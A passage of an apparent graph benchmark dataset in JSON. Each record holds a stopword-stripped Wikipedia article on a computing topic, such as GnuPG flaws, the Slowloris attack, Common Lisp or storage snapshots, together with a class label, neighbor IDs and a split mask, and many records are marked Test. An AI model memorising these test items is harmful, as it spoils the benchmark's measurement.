openpgp standard specifies several methods digitally signing messages 2003 due error change gnupg intended make one methods efficient security vulnerability introduced affected one method digitally signing messages releases gnupg 1.0.2 1.2.3 fewer 1000 keys listed key servers people use method case discouraged damage caused since none publicly reported would appear minimal support method removed gnupg versions released discovery 1.2.4 later two vulnerabilities discovered early 2006 first scripted uses gnupg signature verification may result false positives second non-mime messages vulnerable injection data covered digital signature would reported part signed message cases updated versions gnupg made available time announcement june 2017 vulnerability cve-2017-7526 discovered within libgcrypt bernstein breitner others library used gnupg enabled full key recovery rsa-1024 1/8th rsa-2048 keys side-channel attack exploits fact libgcrypt used sliding windows method exponentiation leads leakage exponent bits full key recovery updated version gnupg made available time announcement october 2017 roca vulnerability announced affects rsa keys generated yubikey 4 tokens often used pgp/gpg many published pgp keys found susceptible around june 2018 sigspoof attacks announced allowed attacker convincingly spoof digital signatures notable applications front ends browser extensions support gpg include following may 2014 washington post reported 12-minute video guide gpg journalists posted vimeo january 2013 user named anon108 post identified anon108 fugitive nsa whistleblower edward snowden said made tutorial — narrated digitally disguised voice whose speech patterns sound similar snowden — teach journalist glenn greenwald email encryption greenwald said could confirm authorship video",
    "neighbors": [
      10242,
      1028,
      4100,
      9745,
      3618,
      2083,
      4644,
      9764,
      5670,
      5179,
      9281,
      8258,
      7238,
      5703,
      10822,
      10831,
      11349,
      6231,
      1112,
      3674,
      8283,
      10850,
      10341,
      9318,
      8304,
      7794,
      5749,
      7805,
      5759,
      2180,
      4230,
      3207,
      8329,
      4746,
      8331,
      9865,
      6797,
      11418,
      3744,
      10405,
      4265,
      4268,
      7859,
      2228,
      2233,
      5833,
      7887,
      3794,
      728,
      7904,
      10464,
      3817,
      9451,
      237,
      8436,
      251,
      5373,
      8449,
      9986,
      5899,
      5391,
      1297,
      1810,
      1813,
      5399,
      2332,
      8476,
      10012,
      802,
      4389,
      11046,
      811,
      11052,
      7983,
      6962,
      3382,
      823,
      5433,
      10566,
      9548,
      11088,
      3422,
      9569,
      9579,
      10096,
      1394,
      2932,
      5492,
      6519,
      3959,
      2948,
      11654,
      10631,
      4493,
      1939,
      5016,
      4001,
      5028,
      3495,
      9642,
      11180,
      1456,
      10161,
      5555,
      2487,
      1978,
      9148,
      10687,
      8640,
      3015,
      10697,
      6602,
      5067,
      2001,
      4561,
      7635,
      8147,
      5078,
      1496,
      6617,
      2010,
      9696,
      8673,
      482,
      7139,
      8674,
      5096,
      1007,
      5110,
      503,
      3068,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2051,
    "label": 3,
    "text": "Snapshot_(computer_storage):snapshot computer storage computer systems snapshot state system particular point time term coined analogy photography refer actual copy state system capability provided certain systems full backup large data set may take long time complete multi-tasking multi-user systems may writes data backed prevents backup atomic introduces version skew may result data corruption example user moves file directory already backed file would completely missing backup media since backup operation already taken place addition file version skew may also cause corruption files change size contents underfoot read one approach safely backing live data temporarily disable write access data backup either stopping accessing applications using locking api provided operating system enforce exclusive read access tolerable low-availability systems desktop computers small workgroup servers regular downtime acceptable high-availability 24/7 systems however bear service stoppages avoid downtime high-availability systems may instead perform backup snapshot —a read-only copy data set frozen point time—and allow applications continue writing data snapshot implementations efficient create snapshots 1 words time i/o needed create snapshot increase size data set contrast time i/o required direct backup proportional size data set systems initial snapshot taken data set subsequent snapshots copy changed data use system pointers reference initial snapshot method pointer-based snapshots consumes less disk capacity data set repeatedly cloned unix systems snapshot-capable logical volume managers implement copy-on-write entire block devices copying changed blocksjust overwritten within parent volumesto storage thus preserving self-consistent past image block device filesystems snapshot images later mounted read-only media volume managers also allow creation writable snapshots extending copy-on-write approach disassociating blocks modified within snapshot parent blocks original volume scheme could also described performing additional copy-on-write operations triggered writes snapshots linux logical volume manager lvm allows creation read-only read-write snapshots writable snapshots introduced lvm version 2 lvm2 file systems wafl fossil plan 9 bell labs ods-5 internally track old versions files make snapshots available special namespace others like ufs2 provide operating system api accessing file histories ntfs access snapshots provided volume shadow-copying service vss windows xp windows server 2003 shadow copy windows vista melio fs provides snapshots via vss interface shared storage snapshots also available nss novell storage services file system netware since version 4.11 recently linux platforms open enterprise server product emc isilon onefs clustered storage platform implements single scalable file system supports read-only snapshots file directory level file directory within file system snapshotted system implement copy-on-write point-in-time snapshot dynamically based method determined optimal system linux btrfs ocfs2 file systems support creating snapshots cloning individual files additionally btrfs also supports creation snapshots subvolumes aix jfs2 also support snapshots sun microsystems zfs hybrid implementation tracks read-write snapshots block level makes branched file sets nameable user applications clones time machine included apple mac os x v10.5 operating system snapshotting scheme system-level incremental backup service merely watches mounted volumes changes copies changed files periodically specially-designated volume using hard links ancient hfs plus file system n't snapshotting feature apple new apfs file system introduces feature",
    "neighbors": [
      2944,
      5120,
      8451,
      2564,
      1801,
      11017,
      1291,
      6669,
      2193,
      8338,
      3219,
      5013,
      5142,
      2199,
      7189,
      1049,
      9882,
      9343,
      3366,
      2345,
      10921,
      9902,
      7983,
      1203,
      1844,
      823,
      10681,
      11065,
      2108,
      11581,
      10302,
      6591,
      11072,
      9665,
      8772,
      10565,
      8395,
      8402,
      4438,
      2397,
      734,
      4450,
      739,
      1636,
      1509,
      10851,
      4074,
      3692,
      1263,
      2675,
      5492,
      9844,
      11638,
      11256,
      890,
      6014,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 2052,
    "label": 7,
    "text": "Beeline_(software_company):beeline software company beeline software-as-a-service company dealing solutions sourcing managing extended workforce company ranks among largest vendor management system vms providers terms total temp/contract spend outsourced spend staffing industry analysts 2017 vms markets development summary report beeline founded 1999 workforce solutions business unit mps group inc. jacksonville florida company among first offer vms solutions december 2016 chicago-based private equity firm gtcr acquired beeline merged company iqnavigator previously competitor workforce management solutions marketplace merged company operates beeline brand name march 2017 beeline named leader “ contingent workers consulting services ” forrester wave services procurement q1 2017 report forrester research inc. gartner inc. ranked beeline first statement work procurement critical capabilities services procurement solutions report july 2018 beeline announced acquired new mountain capital new york city-based private equity firm undisclosed amount beeline collaborates number partner organizations including talent providers enterprise software solution providers managed services providers msps strategic msp partners include allegis global solutions hayes talent solutions kellyocg pontoon",
    "neighbors": [
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 2053,
    "label": 4,
    "text": "MD5CRK:md5crk cryptography md5crk distributed effort similar distributed.net launched jean-luc cooke company certainkey cryptosystems demonstrate md5 message digest algorithm insecure finding collision — two messages produce md5 hash project went live march 1 2004 project ended august 24 2004 researchers independently demonstrated technique generating collisions md5 using analytical methods xiaoyun wang feng xuejia lai yu certainkey awarded 10,000 canadian dollar prize wang feng lai yu discovery technique called floyd cycle-finding algorithm used try find collision md5 algorithm described analogy random walk using principle function finite number possible outputs placed feedback loop cycle one use relatively small amount memory store outputs particular structures use markers better detect marker passed markers called distinguished points point two inputs produce output called collision point md5crk considered point whose first 32 bits zeroes distinguished point expected time find collision equal formula_1 formula_2 number bits digest output fact formula_3 formula_4 number function outputs collected project probability success formula_4 md5 computations approximated formula_6 expected number computations required produce collision 128-bit md5 message digest function thus formula_7 give perspective using virginia tech system x maximum performance 12.25 teraflops would take approximately formula_8 seconds 3 weeks commodity processors 2 gigaflops would take 6,000 machines approximately amount time",
    "neighbors": [
      3282,
      7556
    ],
    "mask": "Test"
  },
  {
    "node_id": 2054,
    "label": 0,
    "text": "Index_Translationum:index translationum index translationum unesco database book translations books translated thousands years central record fact league nations established record translations 1932 1946 united nations superseded league unesco assigned index 1979 records computerised since index counts translations individual books authors many books translations rank higher authors books translations example bible single translated book world rank top ten index index counts walt disney company employing many writers single writer authors similar names sometimes included one entry example ranking hergé applies author adventures tintin hergé also b.r hergehahn elisabeth herget douglas hergert hence top authors index presents database query whose results require interpretation according index agatha christie remains most-translated individual author source unesco",
    "neighbors": [
      8688,
      7164,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 2055,
    "label": 2,
    "text": "Tim_Paterson:tim paterson tim paterson born 1956 american computer programmer best known creating 86-dos operating system intel 8086 system emulated application programming interface api cp/m created gary kildall 86-dos later formed basis ms-dos widely used personal computer operating system 1980s paterson educated seattle public schools graduating ingraham high school 1974 attended university washington working repair technician retail computer store green lake area seattle washington graduated magna cum laude degree computer science june 1978 went work seattle computer products designer engineer designed hardware microsoft z-80 softcard z80 cpu ran cp/m operating system apple ii month later intel released 8086 cpu paterson went work designing s-100 8086 board went market november 1979 commercial software existed board microsoft standalone disk basic-86 standard cp/m operating system time available cpu without true operating system sales slow paterson began work qdos quick dirty operating system april 1980 fill void copying apis cp/m sources including published cp/m manual would highly compatible qdos soon renamed 86-dos version 0.10 complete july 1980 version 1.14 86-dos grown 4,000 lines assembly code december 1980 microsoft secured rights market 86-dos hardware manufacturers acknowledging made 86-dos compatible cp/m paterson maintained 86-dos program original work denied allegations referred cp/m code writing book appeared 2004 claiming 86-dos unoriginal rip-off cp/m paterson sued authors publishers defamation judge found paterson failed provide evidence regarding serious doubts accuracy gary kildall chapter instead careful review lefer notes ... provides research picture tellingly close substance final chapter case dismissed basis book claims constitutionally protected opinions provably false paterson left scp april 1981 worked microsoft may 1981 april 1982 brief second stint scp paterson started company falcon technology a.k.a falcon systems 1983 microsoft contracted paterson port ms-dos msx computers standard developing ascii paterson accepted contract help fund company completed work msx-dos operating system 1984 falcon technology bought microsoft 1986 reclaim royalty-free licenses ms-dos eventually becoming part phoenix technologies paterson worked second stint microsoft 1986 1988 third stint 1990 1998 time worked visual basic leaving microsoft third time paterson founded another software development company paterson technology also made several appearances comedy central television program battlebots paterson also raced rally cars scca pro rally series even engineered trip computer integrated axle four-wheel drive porsche 911",
    "neighbors": [
      5762,
      4548,
      6148,
      4441,
      5293,
      8301,
      847,
      7983,
      3953,
      9006,
      8115,
      9166,
      7317,
      9907,
      4409,
      2811,
      4735
    ],
    "mask": "Test"
  },
  {
    "node_id": 2056,
    "label": 9,
    "text": "David_A._Moon:david moon david moon programmer computer scientist known work lisp programming language co-author emacs text editor inventor ephemeral garbage collection one designers dylan programming language guy l. steele jr. richard p. gabriel 1993 name leader common lisp movement describe seductively powerful thinker quiet often insulting whose arguments almost impossible refute maclisp variant lisp developed massachusetts institute technology mit richard greenblatt late 1960s originally ran pdp-6 pdp-10 computers made digital equipment corporation early 1970s moon headed project mit reimplemented maclisp different kind computer honeywell 6180 running multics operating system compiler developed ncomplr became standard lisp compilers measured part project also wrote became standard manual maclisp generally titled maclisp reference manual often called moonual moon one original members greenblatt project develop mit lisp machine beginning 1974 1976 steele wrote first teco-based version emacs text editor 1978 daniel weinreb coauthored manual lisp machine known chine nual howard cannon developed flavors system object-oriented programming multiple inheritance lisp machine part lisp machine project also invented ephemeral garbage collection advance led widespread use continuously-operating garbage collection systems lisp generally symbolics founded 1980 commercialize lisp machine became one founders continued develop new hardware software symbolics listed symbolics fellow 1989 left company 1990 join project develop new operating system also made important contributions standardization common lisp later worked apple computer became one primary contributors language design dylan programming language",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      6919,
      10630,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      8474,
      6556,
      3869,
      10012,
      2335,
      1952,
      6047,
      8226,
      4516,
      5031,
      9128,
      5033,
      5803,
      7983,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      11495,
      2666,
      3051,
      5360,
      5361,
      8435,
      6772,
      3446,
      5751,
      10104,
      6906,
      7805
    ],
    "mask": "None"
  },
  {
    "node_id": 2057,
    "label": 5,
    "text": "Polarization-division_multiplexing:polarization-division multiplexing polarization-division multiplexing pdm physical layer method multiplexing signals carried electromagnetic waves allowing two channels information transmitted carrier frequency using waves two orthogonal polarization states used microwave links satellite television downlinks double bandwidth using two orthogonally polarized feed antennas satellite dishes also used fiber optic communication transmitting separate left right circularly polarized light beams optical fiber polarization techniques long used radio transmission reduce interference channels particularly vhf frequencies beyond circumstances data rate radio link doubled transmitting two separate channels radio waves frequency using orthogonal polarization example point point terrestrial microwave links transmitting antenna two feed antennas vertical feed antenna transmits microwaves electric field vertical vertical polarization horizontal feed antenna transmits microwaves frequency electric field horizontal horizontal polarization two separate channels received vertical horizontal feed antennas receiving station satellite communications orthogonal circular polarization often used instead i.e right- left-handed sense circular polarization changed relative orientation antenna space dual polarization system comprises usually two independent transmitters connected means waveguide tem lines coaxial cables stripline quasi-tem microstrip single-polarization antenna standard operation although two separate single-polarization antennas used pdm two adjacent feeds reflector antenna radiating two independent polarization states often easily achieved means single dual-polarization antenna transmitter waveguide interface typically rectangular order single-mode region operating frequency dual-polarized antenna circular square waveguide port radiating element chosen modern communication systems circular square waveguide port needed least two degenerate modes supported ad-hoc component must therefore introduced situations merge two separate single-polarized signals one dual-polarized physical interface namely ortho-mode transducer omt case transmitter tem quasi-tem output connections instead dual-polarization antenna often presents separate connections i.e printed square patch antenna two feed points embeds function omt means intrinsically transferring two excitation signals orthogonal polarization states dual-polarized signal thus carries two independent data streams receiving antenna single-polarized one receiving one two streams time dual-polarized model relaying received signal two single-polarization output connectors via omt waveguide ideal dual-polarization system lies foundation onto perfect orthogonality two polarization states single-polarized interfaces receiver would theoretically contain signal meant transmitted desired polarization thus introducing interference allowing two data streams multiplexed demultiplexed transparently without degradation due coexistence companies working commercial pdm technology include siae microelettronica huawei alcatel-lucent types outdoor microwave radios integrated orthomode transducers operate polarities single radio unit performing cross-polarization interference cancellation xpic within radio unit alternatively orthomode transducer may built antenna allow connection separate radios separate ports radio antenna practical systems however suffer non-ideal behaviors mix signals polarization states together consequence signal one received single-polarization terminals actually contains dominant quantity desired signal meant transmitted onto one polarization minor amount undesired signal meant transported polarization represents interference former consequence received signal must cleared interference level order reach required signal-to-noise-and-interference ratio snir needed receiving stages may order 30 db high-level m-qam schemes operation carried cross-polarization-interference cancellation xpic typically implemented baseband digital stage compared spatial multiplexing received signals pmd system much favourable carrier-to-interference ratio amount leakage often much smaller useful signal whereas spatial multiplexing operates amount interference equal amount useful signal observation valid good pmd design allows adaptive xpic designed simpler manner general mimo cancelling scheme since starting point without cancellation typically already sufficient establishing low-capacity link means reduced modulation xpic typically acts one received signals c containing desired signal dominant term uses received x signal containing interfering signal dominant term xpic algorithm multiplies x complex coefficient adds received c complex recombination coefficient adjusted adaptively maximize mmse measured recombination mmse improved required level two terminals switch high-order modulations novel method polarized antenna transmission utilizing differential technique .. polarization-division multiplexing typically used together phase modulation optical qam allowing transmission speeds 100 gbit/s single wavelength sets pdm wavelength signals carried wavelength-division multiplexing infrastructure potentially substantially expanding capacity multiple polarization signals combined form new states polarization known parallel polarization state generation major problem practical use pdm fiber-optic transmission systems drifts polarization state occur continuously time due physical changes fibre environment long-distance system drifts accumulate progressively without limit resulting rapid erratic rotation polarized light jones vector entire poincaré sphere polarization mode dispersion polarization-dependent loss cross-polarization modulation phenomena cause problems pdm systems reason pdm generally used conjunction advanced channel coding techniques allowing use digital signal processing decode signal way resilient polarization-related signal artifacts modulations used include pdm-qpsk pdm-dqpsk companies working commercial pdm technology include alcatel-lucent ciena cisco systems huawei infinera",
    "neighbors": [
      3847,
      1550,
      2458,
      5020,
      5664,
      7723,
      11181,
      1969,
      2994,
      6834,
      1083,
      10303,
      448,
      7490,
      3140,
      7108,
      11591,
      5321,
      7498,
      9296,
      119,
      3168,
      1121,
      4068,
      7400,
      1650,
      2802,
      3959
    ],
    "mask": "Test"
  },
  {
    "node_id": 2058,
    "label": 3,
    "text": "Basilisk_II:basilisk ii basilisk ii emulator emulates apple macintosh computers based motorola 68000 series software cross-platform used variety operating systems latest version mac os run within basilisk ii mac os 8.1 last 680x0-compatible version newer mac os versions incompatible require powerpc-based processor basilisk ii emulate alpha versions available january 1999 first non-alpha release october year ports basilisk ii exist multiple computing platforms including amigaos 4 beos linux amiga windows nt mac os x morphos mobile devices playstation portable released terms gnu general public license basilisk ii free software source code available github",
    "neighbors": [
      5378,
      6150,
      3082,
      4238,
      5264,
      8976,
      2839,
      2212,
      6438,
      295,
      10537,
      7983,
      7349,
      7733,
      823,
      9655,
      5049,
      11447,
      2236,
      318,
      576,
      5697,
      10691,
      5702,
      7507,
      11221,
      2910,
      1513,
      6377,
      5612,
      8439,
      11513,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 2059,
    "label": 0,
    "text": "Named-entity_recognition:named-entity recognition named-entity recognition ner also known entity identification entity chunking entity extraction subtask information extraction seeks locate classify named entity mentions unstructured text pre-defined categories person names organizations locations medical codes time expressions quantities monetary values percentages etc research ner systems structured taking unannotated block text one producing annotated block text highlights names entities example person name consisting one token two-token company name temporal expression detected classified state-of-the-art ner systems english produce near-human performance example best system entering muc-7 scored 93.39 f-measure human annotators scored 97.60 96.95 notable ner platforms include expression named entity word named restricts task entities one many strings words phrases stands fairly consistently referent closely related rigid designators defined kripke although practice ner deals many names referents philosophically rigid instance automotive company created henry ford 1903 referred ford ford motor company although ford refer many entities well see ford rigid designators include proper names well terms certain biological species substances exclude pronouns see coreference resolution descriptions pick referent properties see also de dicto de names kinds things opposed individuals example bank full named-entity recognition often broken conceptually possibly also implementations two distinct problems detection names classification names type entity refer e.g person organization location first phase typically simplified segmentation problem names defined contiguous spans tokens nesting bank america single name disregarding fact inside name substring america name segmentation problem formally similar chunking second phase requires choosing ontology organize categories things temporal expressions numerical expressions i.e. money percentages etc may also considered named entities context ner task instances types good examples rigid designators e.g. year 2001 also many invalid ones e.g. take vacations “ june ” first case year 2001 refers 2001st year gregorian calendar second case month june may refer month undefined year past june next june every june etc. arguable definition named entity loosened cases practical reasons definition term named entity therefore strict often explained context used certain hierarchies named entity types proposed literature bbn categories proposed 2002 used question answering consists 29 types 64 subtypes sekine extended hierarchy proposed 2002 made 200 subtypes recently 2011 ritter used hierarchy based common freebase entity types ground-breaking experiments ner social media text evaluate quality ner system output several measures defined usual measures called precision recall f1 score however several issues remain calculate values statistical measures work reasonably well obvious cases finding missing real entity exactly finding non-entity however ner fail many ways many arguably partially correct counted compete success failures example identifying real entity one overly simple method measuring accuracy merely count fraction tokens text correctly incorrectly identified part entity references entities correct type suffers least two problems first vast majority tokens real-world text part entity names baseline accuracy always predict entity extravagantly high typically 90 second mispredicting full span entity name properly penalized finding person first name last name follows might scored ½ accuracy academic conferences conll variant f1 score defined follows follows definition prediction misses single token includes spurious token wrong class hard error contribute positively either precision recall thus measure may said pessimistic case many errors close correct might adequate given purpose example one system might always omit titles ms. ph.d. compared system ground-truth data expects titles included cases every name treated error issues important actually examine kinds errors decide important given one goals requirements evaluation models based token-by-token matching proposed models may given partial credit overlapping matches using intersection union criterion allow finer grained evaluation comparison extraction systems ner systems created use linguistic grammar-based techniques well statistical models machine learning hand-crafted grammar-based systems typically obtain better precision cost lower recall months work experienced computational linguists statistical ner systems typically require large amount manually annotated training data semisupervised approaches suggested avoid part annotation effort many different classifier types used perform machine-learned ner conditional random fields typical choice research indicates even state-of-the-art ner systems brittle meaning ner systems developed one domain typically perform well domains considerable effort involved tuning ner systems perform well new domain true rule-based trainable statistical systems early work ner systems 1990s aimed primarily extraction journalistic articles attention turned processing military dispatches reports later stages automatic content extraction ace evaluation also included several types informal text styles weblogs text transcripts conversational telephone speech conversations since 1998 great deal interest entity identification molecular biology bioinformatics medical natural language processing communities common entity interest domain names genes gene products also considerable interest recognition chemical entities drugs context chemdner competition 27 teams participating task despite high f1 numbers reported muc-7 dataset problem named-entity recognition far solved main efforts directed reducing annotation labor employing semi-supervised learning robust performance across domains scaling fine-grained entity types recent years many projects turned crowdsourcing promising solution obtain high-quality aggregate human judgments supervised semi-supervised machine learning approaches ner another challenging task devising models deal linguistically complex contexts twitter search queries researchers comparisons ner performances different statistical models hmm hidden markov model maximum entropy crf conditional random fields feature sets researchers recently proposed graph-based semi-supervised learning model language specific ner tasks recently emerging task identifying important expressions text cross-linking wikipedia seen instance extremely fine-grained named entity recognition types actual wikipedia pages describing potentially ambiguous concepts example output wikification system another field seen progress remains challenging application ner twitter microblogs",
    "neighbors": [
      10497,
      5122,
      8323,
      2440,
      6798,
      5778,
      11538,
      1044,
      5399,
      8216,
      538,
      3617,
      293,
      7333,
      5288,
      10794,
      7724,
      5677,
      2223,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      1890,
      8291,
      7780,
      7013,
      4327,
      2157,
      7918,
      8046,
      8688,
      9328,
      10231,
      8440,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2060,
    "label": 4,
    "text": "Slowloris_(computer_security):slowloris computer security slowloris type denial service attack tool invented robert rsnake hansen allows single machine take another machine web server minimal bandwidth side effects unrelated services ports slowloris tries keep many connections target web server open hold open long possible accomplishes opening connections target web server sending partial request periodically send subsequent http headers adding to—but never completing—the request affected servers keep connections open filling maximum concurrent connection pool eventually denying additional connection attempts clients includes necessarily limited following per attack author slowloris exploits problems handling thousands connections attack less effect servers handle large numbers connections well proxying servers caching accelerators varnish nginx squid recommended mitigate particular kind attack addition certain servers resilient attack way design including hiawatha iis lighttpd cherokee cisco css reliable configurations affected web servers prevent slowloris attack ways mitigate reduce impact attack general involve increasing maximum number clients server allow limiting number connections single ip address allowed make imposing restrictions minimum transfer speed connection allowed restricting length time client allowed stay connected apache web server number modules used limit damage caused slowloris attack apache modules mod_limitipconn mod_qos mod_evasive mod security mod_noloris mod_antiloris suggested means reducing likelihood successful slowloris attack since apache 2.2.15 apache ships module mod_reqtimeout official solution supported developers mitigating techniques involve setting reverse proxies firewalls load balancers content switches administrators could also change affected web server software unaffected form attack example lighttpd nginx succumb specific attack protests erupted wake 2009 iranian presidential election slowloris arose prominent tool used leverage dos attacks sites run iranian government belief flooding ddos attacks would affect internet access government protesters equally due significant bandwidth consume slowloris attack chosen instead high impact relatively low bandwidth number government run sites targeted attacks including gerdab.ir leader.ir president.ir variant attack used spam network river city media force gmail servers send thousands messages en-bulk opening thousands connections gmail api message sending requests completing since release number programs appeared mimic function slowloris providing additional functionality running different environments",
    "neighbors": [
      4485,
      8582,
      4488,
      3856,
      9616,
      3237,
      8998,
      6834,
      953,
      2754,
      9538,
      6347,
      4558,
      4439,
      3290,
      865,
      2018,
      10852,
      2409,
      6122,
      5612,
      3581,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 2061,
    "label": 2,
    "text": "Keith_Bostic:keith bostic keith bostic american software engineer one key people history berkeley software distribution unix open-source software 1986 bostic joined computer systems research group csrg university california berkeley one principal architects berkeley 2bsd 4.4bsd 4.4bsd-lite releases among many tasks led effort csrg create free software version bsd unix helped allow creation freebsd netbsd openbsd bostic founder berkeley software design inc. bsdi produced bsd/os proprietary version bsd 1993 usenix association gave lifetime achievement award flame computer systems research group university california berkeley honoring 180 individuals including bostic contributed csrg 4.4bsd-lite release bostic wife margo seltzer founded sleepycat software 1996 develop commercialize berkeley db open-source key-value database sleepycat software first company dual-licensed open-source software february 2006 company acquired oracle corporation bostic worked 2008 bostic michael cahill founded wiredtiger 2010 create nosql database management system november 2014 company acquired mongodb employs bostic bostic author nvi re-implementation classic text editor vi many standard bsd linux utilities past member association computing machinery ieee several posix working groups contributor posix standards",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      7561,
      5771,
      10761,
      9743,
      8725,
      5534,
      1316,
      8612,
      684,
      4908,
      1839,
      7983,
      1718,
      1080,
      1594,
      9151,
      9153,
      3651,
      7748,
      10436,
      9927,
      8395,
      8012,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      8671,
      9320,
      873,
      9452,
      633,
      8316
    ],
    "mask": "None"
  },
  {
    "node_id": 2062,
    "label": 9,
    "text": "Common_Lisp:common lisp common lisp cl dialect lisp programming language published ansi standard document ansi incits 226-1994 r2004 formerly x3.226-1994 r1999 common lisp hyperspec hyperlinked html version derived ansi common lisp standard common lisp language developed standardized improved successor maclisp early 1980s several groups already work diverse successors maclisp lisp machine lisp aka zetalisp spice lisp nil s-1 lisp common lisp sought unify standardise extend features maclisp dialects common lisp implementation rather language specification several implementations common lisp standard available including free open-source software proprietary products common lisp general-purpose multi-paradigm programming language supports combination procedural functional object-oriented programming paradigms dynamic programming language facilitates evolutionary incremental software development iterative compilation efficient run-time programs incremental development often done interactively without interrupting running application also supports optional type annotation casting added necessary later profiling optimization stages permit compiler generate efficient code instance codice_1 hold unboxed integer range supported hardware implementation permitting efficient arithmetic big integers arbitrary precision types similarly compiler told per-module per-function basis type safety level wanted using optimize declarations common lisp includes clos object system supports multimethods method combinations often implemented metaobject protocol common lisp extensible standard features lisp macros code transformations reader macros input parsers characters common lisp provides backwards compatibility maclisp john mccarthy original lisp allows older lisp software ported common lisp work common lisp started 1981 initiative arpa manager bob engelmore develop single community standard lisp dialect much initial language design done via electronic mail 1982 guy l. steele jr. gave first overview common lisp 1982 acm symposium lisp functional programming first language documentation published 1984 common lisp language first edition second edition published 1990 incorporated many changes language made ansi common lisp standardization process final ansi common lisp standard published 1994 since update standard published various extensions improvements common lisp examples unicode concurrency clos-based io provided implementations libraries many available via quicklisp common lisp dialect lisp uses s-expressions denote code data structure function calls macro forms special forms written lists name operator first examples common lisp many data types number types include integers ratios floating-point numbers complex numbers common lisp uses bignums represent numerical values arbitrary size precision ratio type represents fractions exactly facility available many languages common lisp automatically coerces numeric values among types appropriate common lisp character type limited ascii characters modern implementations allow unicode characters symbol type common lisp languages largely unknown outside symbol unique named data object several parts name value function property list package value cell function cell important symbols lisp often used similarly identifiers languages hold value variable however many uses normally symbol evaluated value returned symbols evaluate example symbols keyword package self-evaluating boolean values common lisp represented self-evaluating symbols nil common lisp namespaces symbols called 'packages number functions available rounding scalar numeric values various ways function codice_2 rounds argument nearest integer halfway cases rounded even integer functions codice_3 codice_4 codice_5 round towards zero respectively functions return discarded fractional part secondary value example codice_6 yields -3 0.5 codice_7 yields -2 -0.5 codice_8 yields 2 0.5 codice_9 yields 4 -0.5 sequence types common lisp include lists vectors bit-vectors strings many operations work sequence type almost lisp dialects lists common lisp composed conses sometimes called cons cells pairs cons data structure two slots called car cdr list linked chain conses empty list cons car refers member list possibly another list cons cdr refers next cons—except last cons list whose cdr refers codice_10 value conses also easily used implement trees complex data structures though usually advised use structure class instances instead also possible create circular data structures conses common lisp supports multidimensional arrays dynamically resize adjustable arrays required multidimensional arrays used matrix mathematics vector one-dimensional array arrays carry type members even mixed types array specialized contain specific type members vector bits usually types supported many implementations optimize array functions array used type-specialized two type-specialized array types standard string vector characters bit-vector vector bits hash tables store associations data objects object may used key value hash tables automatically resized needed packages collections symbols used chiefly separate parts program namespaces package may export symbols marking part public interface packages use packages structures similar use c structs pascal records represent arbitrary complex data structures number type fields called slots structures allow single-inheritance classes similar structures offer dynamic features multiple-inheritance see clos classes added late common lisp conceptual overlap structures objects created classes called instances special case generic functions generic functions functions instances common lisp supports first-class functions instance possible write functions take functions arguments return functions well makes possible describe general operations common lisp library relies heavily higher-order functions example codice_11 function takes relational operator argument key function optional keyword argument used sort type data also sort data structures according key evaluation model functions simple evaluator encounters form codice_12 presumes symbol named f one following f name function arguments a1 a2 ... evaluated left-to-right order function found invoked values supplied parameters macro codice_14 defines functions function definition gives name function names arguments function body function definitions may include compiler directives known declarations provide hints compiler optimization settings data types arguments may also include documentation strings docstrings lisp system may use provide interactive documentation anonymous functions function literals defined using codice_13 expressions e.g codice_16 function squares argument lisp programming style frequently uses higher-order functions useful provide anonymous functions arguments local functions defined codice_17 codice_18 number operators related definition manipulation functions instance function may compiled codice_19 operator lisp systems run functions using interpreter default unless instructed compile others compile every function macro codice_20 defines generic functions generic functions collection methods macro codice_21 defines methods methods specialize parameters clos standard classes system classes structure classes individual objects many types corresponding system classes generic function called multiple-dispatch determine effective method use generic functions also first class data type many features generic functions methods described namespace function names separate namespace data variables key difference common lisp scheme common lisp operators define names function namespace include codice_14 codice_17 codice_18 codice_21 codice_20 pass function name argument another function one must use codice_27 special operator commonly abbreviated codice_28 first codice_11 example refers function named symbol codice_30 function namespace code codice_31 conversely call function passed way one would use codice_32 operator argument scheme evaluation model simpler one namespace positions form evaluated order -- arguments code written one dialect therefore sometimes confusing programmers experienced instance many common lisp programmers like use descriptive variable names list string could cause problems scheme would locally shadow function names whether separate namespace functions advantage source contention lisp community usually referred lisp-1 vs. lisp-2 debate lisp-1 refers scheme model lisp-2 refers common lisp model names coined 1988 paper richard p. gabriel kent pitman extensively compares two approaches common lisp supports concept multiple values expression always single primary value might also number secondary values might received inspected interested callers concept distinct returning list value secondary values fully optional passed via dedicated side channel means callers may remain entirely unaware secondary values need makes convenient use mechanism communicating information sometimes useful always necessary example multiple values supported handful standard forms common codice_35 special form accessing secondary values codice_36 returning multiple values data types common lisp include like programs many programming languages common lisp programs make use names refer variables functions many kinds entities named references subject scope association name entity name refers called binding scope refers set circumstances name determined particular binding circumstances determine scope common lisp include understand symbol refers common lisp programmer must know kind reference expressed kind scope uses variable reference dynamic versus lexical scope also run-time situation environment reference resolved binding introduced environment et cetera environments lisp globally pervasive instance new type defined known everywhere thereafter references type look global environment one type environment common lisp dynamic environment bindings established environment dynamic extent means binding established start execution construct codice_51 block disappears construct finishes executing lifetime tied dynamic activation deactivation block however dynamic binding visible within block also visible functions invoked block type visibility known indefinite scope bindings exhibit dynamic extent lifetime tied activation deactivation block indefinite scope visible functions called block said dynamic scope common lisp support dynamically scoped variables also called special variables certain kinds bindings necessarily dynamically scoped also restarts catch tags function bindings dynamically scoped using codice_17 provides lexically scoped function bindings function objects first-level object common lisp assigned dynamically scoped variables bound using codice_51 dynamic scope called using codice_32 codice_57 dynamic scope extremely useful adds referential clarity discipline global variables global variables frowned upon computer science potential sources error give rise ad-hoc covert channels communication among modules 